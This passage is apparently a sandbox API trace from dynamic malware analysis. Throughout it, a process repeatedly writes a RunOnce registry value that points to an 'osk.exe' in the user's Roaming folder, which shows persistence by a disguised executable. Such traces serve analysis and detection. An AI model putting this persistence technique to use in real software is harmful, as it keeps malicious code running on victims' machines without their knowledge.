lpMsg=0x33f7fc) returned 1 [0103.215] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.215] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.215] KillTimer (hWnd=0x20280, uIDEvent=0x23bc) returned 1 [0103.216] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.216] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.216] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.216] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.216] RegCloseKey (hKey=0x280) returned 0x0 [0103.216] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.217] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.217] SetTimer (hWnd=0x20280, nIDEvent=0x23bd, uElapse=0xa, lpTimerFunc=0x0) returned 0x23bd [0103.217] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.231] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.231] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.231] KillTimer (hWnd=0x20280, uIDEvent=0x23bd) returned 1 [0103.231] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.231] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.232] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.232] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.232] RegCloseKey (hKey=0x280) returned 0x0 [0103.232] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.232] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.232] SetTimer (hWnd=0x20280, nIDEvent=0x23be, uElapse=0xa, lpTimerFunc=0x0) returned 0x23be [0103.232] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.248] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.248] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.249] KillTimer (hWnd=0x20280, uIDEvent=0x23be) returned 1 [0103.249] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.249] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.249] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.249] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.250] RegCloseKey (hKey=0x280) returned 0x0 [0103.250] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.250] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.250] SetTimer (hWnd=0x20280, nIDEvent=0x23bf, uElapse=0xa, lpTimerFunc=0x0) returned 0x23bf [0103.250] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.262] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.262] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.262] KillTimer (hWnd=0x20280, uIDEvent=0x23bf) returned 1 [0103.262] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.262] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.263] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.263] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.263] RegCloseKey (hKey=0x280) returned 0x0 [0103.263] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.263] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.263] SetTimer (hWnd=0x20280, nIDEvent=0x23c0, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c0 [0103.263] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.277] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.277] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.278] KillTimer (hWnd=0x20280, uIDEvent=0x23c0) returned 1 [0103.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.278] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.278] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.278] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.279] RegCloseKey (hKey=0x280) returned 0x0 [0103.279] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.279] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.279] SetTimer (hWnd=0x20280, nIDEvent=0x23c1, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c1 [0103.279] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.293] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.293] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.293] KillTimer (hWnd=0x20280, uIDEvent=0x23c1) returned 1 [0103.293] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.295] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.295] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.295] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.295] RegCloseKey (hKey=0x280) returned 0x0 [0103.295] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.295] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.296] SetTimer (hWnd=0x20280, nIDEvent=0x23c2, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c2 [0103.296] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.309] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.309] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.309] KillTimer (hWnd=0x20280, uIDEvent=0x23c2) returned 1 [0103.309] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.309] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.309] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.310] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.310] RegCloseKey (hKey=0x280) returned 0x0 [0103.310] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.310] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.310] SetTimer (hWnd=0x20280, nIDEvent=0x23c3, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c3 [0103.310] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.324] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.324] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.324] KillTimer (hWnd=0x20280, uIDEvent=0x23c3) returned 1 [0103.325] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.325] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.325] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.326] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.326] RegCloseKey (hKey=0x280) returned 0x0 [0103.326] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.326] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.326] SetTimer (hWnd=0x20280, nIDEvent=0x23c4, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c4 [0103.326] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.340] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.340] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.340] KillTimer (hWnd=0x20280, uIDEvent=0x23c4) returned 1 [0103.340] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.341] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.341] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.341] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.341] RegCloseKey (hKey=0x280) returned 0x0 [0103.341] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.342] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.342] SetTimer (hWnd=0x20280, nIDEvent=0x23c5, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c5 [0103.342] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.356] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.356] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.356] KillTimer (hWnd=0x20280, uIDEvent=0x23c5) returned 1 [0103.356] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.357] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.357] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.357] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.357] RegCloseKey (hKey=0x280) returned 0x0 [0103.357] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.357] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.357] SetTimer (hWnd=0x20280, nIDEvent=0x23c6, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c6 [0103.357] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.371] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.371] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.371] KillTimer (hWnd=0x20280, uIDEvent=0x23c6) returned 1 [0103.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.372] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.372] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.372] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.373] RegCloseKey (hKey=0x280) returned 0x0 [0103.373] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.373] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.373] SetTimer (hWnd=0x20280, nIDEvent=0x23c7, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c7 [0103.373] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.387] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.387] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.388] KillTimer (hWnd=0x20280, uIDEvent=0x23c7) returned 1 [0103.388] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.388] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.389] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.389] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.389] RegCloseKey (hKey=0x280) returned 0x0 [0103.389] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.389] SetTimer (hWnd=0x20280, nIDEvent=0x23c8, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c8 [0103.389] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.404] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.404] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.404] KillTimer (hWnd=0x20280, uIDEvent=0x23c8) returned 1 [0103.404] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.405] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.405] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.405] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.405] RegCloseKey (hKey=0x280) returned 0x0 [0103.406] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.406] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.406] SetTimer (hWnd=0x20280, nIDEvent=0x23c9, uElapse=0xa, lpTimerFunc=0x0) returned 0x23c9 [0103.406] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.418] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.418] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.418] KillTimer (hWnd=0x20280, uIDEvent=0x23c9) returned 1 [0103.418] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.419] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.419] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.419] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.419] RegCloseKey (hKey=0x280) returned 0x0 [0103.419] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.419] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.420] SetTimer (hWnd=0x20280, nIDEvent=0x23ca, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ca [0103.420] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.433] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.433] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.434] KillTimer (hWnd=0x20280, uIDEvent=0x23ca) returned 1 [0103.434] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.434] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.434] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.435] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.435] RegCloseKey (hKey=0x280) returned 0x0 [0103.435] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.435] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.435] SetTimer (hWnd=0x20280, nIDEvent=0x23cb, uElapse=0xa, lpTimerFunc=0x0) returned 0x23cb [0103.435] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.449] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.449] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.449] KillTimer (hWnd=0x20280, uIDEvent=0x23cb) returned 1 [0103.450] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.450] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.450] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.450] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.451] RegCloseKey (hKey=0x280) returned 0x0 [0103.451] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.451] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.451] SetTimer (hWnd=0x20280, nIDEvent=0x23cc, uElapse=0xa, lpTimerFunc=0x0) returned 0x23cc [0103.451] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.474] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.474] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.474] KillTimer (hWnd=0x20280, uIDEvent=0x23cc) returned 1 [0103.475] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.475] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.475] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.475] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.475] RegCloseKey (hKey=0x280) returned 0x0 [0103.475] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.476] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.476] SetTimer (hWnd=0x20280, nIDEvent=0x23cd, uElapse=0xa, lpTimerFunc=0x0) returned 0x23cd [0103.476] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.481] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.481] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.481] KillTimer (hWnd=0x20280, uIDEvent=0x23cd) returned 1 [0103.481] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.482] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.482] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0103.482] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0103.482] RegCloseKey (hKey=0x280) returned 0x0 [0103.482] IUnknown:Release (This=0x7a9740) returned 0x1 [0103.482] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.482] SetTimer (hWnd=0x20280, nIDEvent=0x23ce, uElapse=0xa, lpTimerFunc=0x0) returned 0x23ce [0103.482] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0103.505] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0103.505] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0103.505] KillTimer (hWnd=0x20280, uIDEvent=0x23ce) returned 1 [0103.505] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0103.506] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0103.506] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 